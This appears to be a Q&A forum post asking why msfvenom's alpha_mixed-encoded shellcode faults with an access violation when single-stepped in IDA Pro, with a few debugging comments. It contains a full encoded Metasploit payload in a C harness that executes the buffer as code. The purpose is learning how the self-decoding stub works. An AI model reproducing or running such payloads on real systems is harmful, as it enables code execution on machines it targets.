# The memory could not be written -> 026 while xoring on IDA Pro?

Tags: assembly, encoding, x86, ida

I am trying to understand how msfvenom x86/alpha_mixed encoder works.

I generated a payload and added it to a c program, Compiled it and disabled DEP for it.

Program.c:

```
#include <stdio.h>
#include <string.h>

int main(){

    unsigned char hello[] = "AAAAAAAAB";
    unsigned char buf[] = 
"\x89\xe6\xd9\xcf\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x79\x6c\x68\x68\x4d\x52\x67\x70\x37\x70\x45\x50\x73\x50\x6c"
"\x49\x69\x75\x36\x51\x59\x50\x50\x64\x4c\x4b\x70\x50\x54\x70"
"\x4e\x6b\x50\x52\x36\x6c\x6c\x4b\x31\x42\x64\x54\x6c\x4b\x42"
"\x52\x47\x58\x34\x4f\x58\x37\x52\x6a\x71\x36\x74\x71\x6b\x4f"
"\x4e\x4c\x65\x6c\x65\x31\x73\x4c\x54\x42\x66\x4c\x67\x50\x4f"
"\x31\x6a\x6f\x54\x4d\x73\x31\x39\x57\x7a\x42\x6a\x52\x42\x72"
"\x66\x37\x6c\x4b\x46\x32\x56\x70\x4c\x4b\x51\x5a\x77\x4c\x4e"
"\x6b\x30\x4c\x36\x71\x52\x58\x5a\x43\x37\x38\x53\x31\x48\x51"
"\x73\x61\x4c\x4b\x33\x69\x35\x70\x65\x51\x59\x43\x6e\x6b\x50"
"\x49\x72\x38\x5a\x43\x57\x4a\x33\x79\x4e\x6b\x45\x64\x4c\x4b"
"\x55\x51\x7a\x76\x50\x31\x4b\x4f\x4c\x6c\x6a\x61\x5a\x6f\x76"
"\x6d\x46\x61\x6a\x67\x30\x38\x59\x70\x31\x65\x6c\x36\x66\x63"
"\x73\x4d\x58\x78\x47\x4b\x51\x6d\x37\x54\x50\x75\x7a\x44\x70"
"\x58\x6e\x6b\x72\x78\x36\x44\x35\x51\x6b\x63\x70\x66\x4e\x6b"
"\x66\x6c\x30\x4b\x6c\x4b\x56\x38\x47\x6c\x65\x51\x69\x43\x6e"
"\x6b\x65\x54\x4c\x4b\x43\x31\x68\x50\x6f\x79\x51\x54\x66\x44"
"\x34\x64\x71\x4b\x73\x6b\x35\x31\x53\x69\x43\x6a\x50\x51\x69"
"\x6f\x6d\x30\x33\x6f\x43\x6f\x72\x7a\x6e\x6b\x77\x62\x5a\x4b"
"\x4c\x4d\x43\x6d\x73\x58\x65\x63\x57\x42\x75\x50\x55\x50\x71"
"\x78\x62\x57\x61\x63\x54\x72\x33\x6f\x53\x64\x35\x38\x52\x6c"
"\x63\x47\x46\x46\x64\x47\x4e\x69\x4d\x38\x79\x6f\x6a\x70\x4f"
"\x48\x7a\x30\x46\x61\x65\x50\x65\x50\x77\x59\x69\x54\x43\x64"
"\x50\x50\x71\x78\x35\x79\x6d\x50\x30\x6b\x45\x50\x6b\x4f\x38"
"\x55\x71\x7a\x56\x6a\x62\x48\x49\x50\x6d\x78\x77\x72\x71\x71"
"\x32\x48\x75\x52\x43\x30\x47\x70\x47\x4d\x6c\x49\x78\x66\x30"
"\x50\x46\x30\x50\x50\x56\x30\x67\x30\x62\x70\x63\x70\x52\x70"
"\x30\x68\x68\x6a\x36\x6f\x4b\x6f\x4b\x50\x59\x6f\x6e\x35\x6a"
"\x37\x42\x4a\x46\x70\x36\x36\x56\x37\x51\x78\x5a\x39\x69\x35"
"\x44\x34\x35\x31\x79\x6f\x39\x45\x6c\x45\x4b\x70\x31\x64\x46"
"\x6a\x39\x6f\x30\x4e\x74\x48\x44\x35\x38\x6c\x78\x68\x35\x37"
"\x77\x70\x45\x50\x57\x70\x61\x7a\x45\x50\x73\x5a\x36\x64\x50"
"\x56\x32\x77\x70\x68\x65\x52\x6b\x69\x49\x58\x53\x6f\x79\x6f"
"\x78\x55\x6d\x53\x39\x68\x55\x50\x73\x4e\x65\x66\x4c\x4b\x70"
"\x36\x72\x4a\x67\x30\x63\x58\x73\x30\x74\x50\x45\x50\x47\x70"
"\x53\x66\x62\x4a\x67\x70\x45\x38\x30\x58\x79\x34\x56\x33\x69"
"\x75\x69\x6f\x39\x45\x4c\x53\x43\x63\x53\x5a\x73\x30\x32\x76"
"\x42\x73\x33\x67\x31\x78\x74\x42\x6e\x39\x38\x48\x53\x6f\x49"
"\x6f\x6b\x65\x4b\x33\x4b\x48\x67\x70\x43\x4d\x65\x78\x53\x68"
"\x33\x58\x33\x30\x73\x70\x75\x50\x43\x30\x53\x5a\x55\x50\x76"
"\x30\x62\x48\x34\x4b\x66\x4f\x74\x4f\x66\x50\x4b\x4f\x58\x55"
"\x51\x47\x50\x68\x73\x45\x30\x6e\x42\x6d\x33\x51\x39\x6f\x48"
"\x55\x71\x4e\x61\x4e\x39\x6f\x76\x6c\x47\x54\x56\x6f\x4b\x35"
"\x44\x30\x4b\x4f\x39\x6f\x69\x6f\x79\x79\x6d\x4b\x4b\x4f\x4b"
"\x4f\x59\x6f\x73\x31\x69\x53\x46\x49\x5a\x66\x72\x55\x4a\x61"
"\x68\x43\x6d\x6b\x4c\x30\x68\x35\x49\x32\x56\x36\x71\x7a\x55"
"\x50\x66\x33\x59\x6f\x59\x45\x41\x41";
    int (*ret)() = (int(*)())buf;

    ret();
    return 0;
}
```

The problem is that if I run the program without any breakpoints on the shellcode, the payload works just fine without any errors. But If I manually follow EIP on shellcode, I get below error on byte `30 41 30` or on the xoring instruction:

```
debug022:0061FBB8 pop     eax
debug022:0061FBB9 push    eax
debug022:0061FBBA xor     [ecx+30h], al
```

A lot of people on the web says, that this often happens when the handle of the process is being held by IDA on `NtCreateFile`. So, I set up a breakpoint directly to `NtCreateFile` function and ran the program. I found out that NtCreateFile function do get called out but first when you execute the process itself even before the start of the `_main` function and secondly when the payload have been decoded/xored. So, I miss the part on how the decoder works.

Error:

> 61FBBA: The instruction at 0x61FBBA referenced memory at 0x26. The memory could not be written -> 00000026 (exc.code c0000005, tid 9096).

I believe the error occurs because the payload is not able to change its surrounding bytes, hence the error. But I don't know how to resolve this as well or how do I share the handle with the encoder process. Can anyone help?

Comment: A debugger that's single-stepping using x86's TF functionality should be totally transparent to software; no stray `0xCC` bytes in instructions that could trip up self-modifying code.  Are you actually single-stepping, or are you setting breakpoints?

Comment: I have a breakpoint on `call shellcode`, once I am in the shellcode I just single step all the way.

Comment: What values are in registers when you fault?  Apparently ECX is 0xfffffff6, so that plus 0x30 is 0x26.  But if you work backwards from there, any way that could happen?

Comment: Although I still don't know what the problem is but if you set a breakpoint before xor instruction and as soon as you step into the shellcode and run the program until you hit your new breakpoint, you get a different value in ECX, and the xor converts the 0x51 to 0x10 or this `6B 41 41 51 32 41 42` become this: `6B 41 41 10 32 41 42`. Not sure about you @PeterCordes, but I am using IDA from 2015, maybe my IDA is broke :(